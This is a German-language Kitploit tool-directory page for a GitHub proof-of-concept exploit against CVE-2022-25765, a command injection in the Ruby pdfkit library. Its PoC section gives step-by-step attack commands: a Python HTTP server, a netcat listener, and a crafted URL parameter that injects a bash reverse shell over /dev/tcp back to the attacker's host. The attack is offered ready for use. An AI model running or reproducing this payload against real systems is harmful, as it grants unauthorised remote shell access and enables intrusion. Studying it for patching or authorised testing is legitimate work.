Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PDFkit-CMD-Injection — Proof-of-Concept-Exploit für CVE-2022-25765, das eine Befehlsinjektion in pdfkit 0.8.6 über einen nicht bereinigten URL-Parameter demonstriert und so Remote-Code-Ausführung sowie eine Reverse Shell ermöglicht. | Kitploit
Tools/GitHubGitHub/lekosbelas/pdfkit-cmd-injection
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and Control
GitHublekosbelas/pdfkit-cmd-injection

PDFkit-CMD-Injection

Proof-of-Concept-Exploit für CVE-2022-25765, das eine Befehlsinjektion in pdfkit 0.8.6 über einen nicht bereinigten URL-Parameter demonstriert und so Remote-Code-Ausführung sowie eine Reverse Shell ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
12vor 3 JahrenNoch nicht geprüft
Teilen

PDFkit-CMD-Injection

CVE-2022-25765 Details

Beschreibung

Das Paket pdfkit ab Version 0.0.0 ist anfällig für Command Injection, da die URL nicht ordnungsgemäß bereinigt wird.

PoC

HTTP-Server starten

root@kitploit:~
1- python3 -m http.server 80

Netcat-Listener starten

root@kitploit:~
2- nc -lnvp 'Target Port'

Eine Anfrage senden

root@kitploit:~
3- http://"TARGET_ADDRESS:Target PORT"//?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/"Target_ADRESS/LISTENING_PORT"<&1'`'}
Tool herunterladen